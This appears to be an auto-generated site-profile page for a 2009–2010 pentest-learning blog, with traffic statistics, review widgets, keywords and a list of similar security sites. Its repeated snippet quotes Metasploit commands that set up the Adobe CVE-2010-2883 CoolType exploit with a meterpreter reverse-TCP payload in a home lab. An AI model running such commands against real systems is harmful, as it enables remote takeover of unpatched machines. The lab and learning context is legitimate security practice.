pentest-n00b.blogspot.com pentest-n00b.blogspot.com

pentest-n00b.blogspot.com

Pentest N00b

Wednesday, 15 September 2010. New Adobe 0day - CVE-2010-2883. Having read that some folks have had mixed results with the Metasploit exploit, I decided I would try and find some reason why. I started out by running up Metasploit and setting up the exploit. Msf use exploit/windows/browser/adobe cooltype sing. Msf exploit(adobe cooltype sing) set PAYLOAD windows/meterpreter/reverse tcp. PAYLOAD = windows/meterpreter/reverse tcp. Msf exploit(adobe cooltype sing) set LHOST 192.168.0.79. Msf exploit(adobe coo...

http://pentest-n00b.blogspot.com/

WEBSITE DETAILS
SEO
PAGES
SIMILAR SITES

TRAFFIC RANK FOR PENTEST-N00B.BLOGSPOT.COM

TODAY'S RATING

>1,000,000

TRAFFIC RANK - AVERAGE PER MONTH

BEST MONTH

August

AVERAGE PER DAY Of THE WEEK

HIGHEST TRAFFIC ON

Thursday

TRAFFIC BY CITY

CUSTOMER REVIEWS

Average Rating: 3.6 out of 5 with 8 reviews
5 star
1
4 star
3
3 star
4
2 star
0
1 star
0

Hey there! Start your review of pentest-n00b.blogspot.com

AVERAGE USER RATING

Write a Review

WEBSITE PREVIEW

Desktop Preview Tablet Preview Mobile Preview

LOAD TIME

0.9 seconds

FAVICON PREVIEW

  • pentest-n00b.blogspot.com

    16x16

  • pentest-n00b.blogspot.com

    32x32

CONTACTS AT PENTEST-N00B.BLOGSPOT.COM

Login

TO VIEW CONTACTS

Remove Contacts

FOR PRIVACY ISSUES

CONTENT

SCORE

6.2

PAGE TITLE
Pentest N00b | pentest-n00b.blogspot.com Reviews
<META>
DESCRIPTION
Wednesday, 15 September 2010. New Adobe 0day - CVE-2010-2883. Having read that some folks have had mixed results with the Metasploit exploit, I decided I would try and find some reason why. I started out by running up Metasploit and setting up the exploit. Msf use exploit/windows/browser/adobe cooltype sing. Msf exploit(adobe cooltype sing) set PAYLOAD windows/meterpreter/reverse tcp. PAYLOAD = windows/meterpreter/reverse tcp. Msf exploit(adobe cooltype sing) set LHOST 192.168.0.79. Msf exploit(adobe coo...
<META>
KEYWORDS
1 pentest n00b
2 module options
3 exploit target
4 id name
5 0 automatic
6 server started
7 active sessions
8 no active sessions
9 hmmm no session
10 what
CONTENT
Page content here
KEYWORDS ON
PAGE
pentest n00b,module options,exploit target,id name,0 automatic,server started,active sessions,no active sessions,hmmm no session,what,try again,sessions l,success,msf use exploit/multi/handler,0 wildcard target,msf exploit handler exploit,meterpreter exit
SERVER
GSE
CONTENT-TYPE
utf-8
GOOGLE PREVIEW

Pentest N00b | pentest-n00b.blogspot.com Reviews

https://pentest-n00b.blogspot.com

Wednesday, 15 September 2010. New Adobe 0day - CVE-2010-2883. Having read that some folks have had mixed results with the Metasploit exploit, I decided I would try and find some reason why. I started out by running up Metasploit and setting up the exploit. Msf use exploit/windows/browser/adobe cooltype sing. Msf exploit(adobe cooltype sing) set PAYLOAD windows/meterpreter/reverse tcp. PAYLOAD = windows/meterpreter/reverse tcp. Msf exploit(adobe cooltype sing) set LHOST 192.168.0.79. Msf exploit(adobe coo...

INTERNAL PAGES

pentest-n00b.blogspot.com pentest-n00b.blogspot.com
1

Pentest N00b: August 2009

http://pentest-n00b.blogspot.com/2009_08_01_archive.html

Monday, 24 August 2009. Well the past few weeks have been a little busy @ work so have not had much time to further my knowledge. I have managed to read about and try to understand how exploits are found and how the exploiter alters the application code to enable an exploit to run in an application, this was mainly utilising the buffer overflow method. There are some nice tutorials here @ Peter Van Eeckhouttes Blog. Http:/ www.corelan.be:8800/. Catch you all soon. Friday, 7 August 2009. Creating Real Loo...

2

Pentest N00b: CitiBank Forces Users To Install In-Secure Software

http://pentest-n00b.blogspot.com/2010/07/citibank-forces-users-to-install-in.html

Thursday, 8 July 2010. CitiBank Forces Users To Install In-Secure Software. For some years now I have known that Citibank CitiDirect web login for online banking will only work with certain out of date JRE versions, the reason for this knowledge is the company I work for have CitiBank accounts. Now since JAVA's JRE has recently been found to be vulnerable to remote code execution this could have been a problem, but we expect that CitiBank would sort things out. Subscribe to: Post Comments (Atom). Java si...

3

Pentest N00b: July 2010

http://pentest-n00b.blogspot.com/2010_07_01_archive.html

Thursday, 8 July 2010. Re Think On Pentest Lab - We Go Totally Open Source. Having played around with my previous Virtual Pentest Lab and found it more than up to the job, Citrix's Xenserver is after all the best Virtualisation system around and for not very much money or free if you don't need the fancy extra's - I have a 2 node Xenserver system with an OPenFiler SAN at the office without the essentials licence and it makes life sooooo easy. Give it a try and watch this space for future developments.

4

Pentest N00b: January 2010

http://pentest-n00b.blogspot.com/2010_01_01_archive.html

Tuesday, 5 January 2010. Having read the latest blog posts from Syn Junkie, I have decided to setup my own pentest lab. Following Syn's recommendations I have decided to to lean on virtualization to provide the basis for my lab. I too have 3 laptops, 1 x Lenovo Thinkpad Z61p running Citrix Xenserver 5.5.0. 1 x Lenovo Thinkpad X60s running Ubuntu 9.10 and KVM. 1 x ASUS EEEPC 1000HE Hackbook running Backtrack 4. I look forward to publishing my exploits with my new Pentesting lab. Subscribe to: Posts (Atom).

5

Pentest N00b: New Adobe 0day - CVE-2010-2883

http://pentest-n00b.blogspot.com/2010/09/new-adobe-0day-cve-2010-2883.html

Wednesday, 15 September 2010. New Adobe 0day - CVE-2010-2883. Having read that some folks have had mixed results with the Metasploit exploit, I decided I would try and find some reason why. I started out by running up Metasploit and setting up the exploit. Msf use exploit/windows/browser/adobe cooltype sing. Msf exploit(adobe cooltype sing) set PAYLOAD windows/meterpreter/reverse tcp. PAYLOAD = windows/meterpreter/reverse tcp. Msf exploit(adobe cooltype sing) set LHOST 192.168.0.79. Msf exploit(adobe coo...

UPGRADE TO PREMIUM TO VIEW 7 MORE

TOTAL PAGES IN THIS WEBSITE

12

OTHER SITES

pentesmensantes.blogspot.com pentesmensantes.blogspot.com

Pentes Mensantes

Jokín está hecho todo un personaje y a partir de ahora podremos seguir sus anécdotas. Larga vida a Jokín! Sr Piko 1.1. Suscribirse a: Entradas (Atom). Postal de Navidad 2006. Desde donde me miran.

pentessimal.com pentessimal.com

coming soon...

A dash of elegant lettering.

pentest-backtrack.blogspot.com pentest-backtrack.blogspot.com

pentest backtrack

Sabtu, 09 Februari 2008. Deepmagic Information Gathering Tool (DMITRY). DMitry (Deepmagic Information Gathering Tool). DMitry (Deepmagic Information Gathering Tool) is a UNIX/(GNU)Linux Command Line Application coded in C. DMitry has the ability to gather as much information as possible about a host. Base functionality is able to gather possible subdomains, email addresses, uptime information, tcp port scan, whois lookups, and more. The following is a list of the current features:. An Open Source Project.

pentest-forum.com pentest-forum.com

Pentest Forum - Index

Function name must be a string in /home/content/36/10070336/html/Sources/Load.php.

pentest-labs.org pentest-labs.org

Fogbeam Demo Server 2 - OpenMeetings, Zeppelin, Stanbol

Demos on demo2.fogbeam.org. Visit demo.fogbeam.org. For demo instances of the Fogcutter Suite, including Quoddy and Neddick.

pentest-n00b.blogspot.com pentest-n00b.blogspot.com

Pentest N00b

Wednesday, 15 September 2010. New Adobe 0day - CVE-2010-2883. Having read that some folks have had mixed results with the Metasploit exploit, I decided I would try and find some reason why. I started out by running up Metasploit and setting up the exploit. Msf use exploit/windows/browser/adobe cooltype sing. Msf exploit(adobe cooltype sing) set PAYLOAD windows/meterpreter/reverse tcp. PAYLOAD = windows/meterpreter/reverse tcp. Msf exploit(adobe cooltype sing) set LHOST 192.168.0.79. Msf exploit(adobe coo...

pentest-professionals.de pentest-professionals.de

Penetrationstest / Pentests, IT-Security Audits, Incident Response - Holzhofer Consulting GmbH, München

Hacking für Manager. Penetrationstests, Sicherheitsanalysen, Incident Response. Verlangt Ihr Kunde von Ihnen die Durchführung eines Penetrationstests? Sie haben den Verdacht, Opfer eines Hackerangriffs geworden zu sein? Sie wollen einen Innentäter beim Datendiebstahl überführen? Benötigen Sie Hilfe bei der Bearbeitung von Sicherheitsvorfällen? Nehmen Sie jetzt Kontakt mit uns auf. Certified Ethical Hacker (CEH). Certified Information Systems Security Professional (CISSP). Certified in Risk and Informatio...

pentest-standard.org pentest-standard.org

The Penetration Testing Execution Standard

From The Penetration Testing Execution Standard. High Level Organization of the Standard. Following are the main sections defined by the standard as the basis for penetration testing execution:. As the standard does not provide any technical guidelines as far as how to execute an actual pentest, we have also created a technical guide to accompany the standard itself. The technical gude can be reached via the link below:. For more information on what this standard is, please visit:.

pentest-tools.com pentest-tools.com

Online Penetration Testing and Ethical Hacking Tools

My IP: 66.160.134.62. PenTest yourself. Don't get hacked. We provide you with more than 20 tools. Trusted by millions of users. Online Penetration Testing Tools. Pentest-Tools.com is an online framework for penetration testing and vulnerability assessment which allows you to quickly assess the security of websites and network infrastructures from a remote location. How this service works. As an anonymous user, you get 40 free credits. If you need more credits per day, you can buy them from here.

pentest-tools.security-audit.com pentest-tools.security-audit.com

Online Penetration Testing Tools | Free Security Ethical Hacking Tools by Security Audit Systems

Call us: 44 (0) 207 0439 349. Online Penetration Testing Tools. Free security tools to help test your websites security. Security Audit Systems offer an array of security services to help businesses secure their online web presence, from vulnerability assessments to secure online asset management. Free account limited to just one time use of this tool. Attempts to discover the version of a (known) web application. Resolves an IP address or domain into the respective identity. Is an extensible utility wit...

pentest-web.com pentest-web.com

Pentest-Web.com